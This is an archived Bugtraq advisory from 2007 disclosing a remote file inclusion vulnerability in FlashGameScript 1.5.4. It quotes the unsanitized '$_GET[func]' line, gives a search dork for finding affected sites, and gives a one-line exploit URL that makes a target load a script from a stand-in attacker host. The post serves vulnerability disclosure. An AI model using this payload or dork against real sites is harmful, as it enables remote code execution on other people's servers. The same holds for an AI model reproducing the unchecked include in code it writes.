bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

from [malic89] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: FlashGameScript v1.5.4 Remote File Inclusion Vulnerability
From: malic89@gmail.com
Date: 21 Feb 2007 13:26:59 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:        : aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version         :1.5.4
URL             :http://www.flashgamescript.com/
Dork            :Copyright © 2006-2007 Powered by FlashGameScript.com version 
1.5 All Rights Reserved 
Price:          :$60
Description :
Flash Game Script is the latest arcade website script created by developers at 
ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner?s profit with 
additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
        
at index.php line 28: $func =$_GET[func];
---------------
Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • FlashGameScript v1.5.4 Remote File Inclusion Vulnerability, malic89 <=
Previous by Date:  RE: SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass, Roger A. Grimes
Next by Date:  iDefense Security Advisory 02.22.07: VeriSign ConfigChk ActiveX Control Buffer Overflow Vulnerability, iDefense Labs
Previous by Thread:  Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit, gmdarkfig
Next by Thread:  iDefense Security Advisory 02.22.07: VeriSign ConfigChk ActiveX Control Buffer Overflow Vulnerability, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]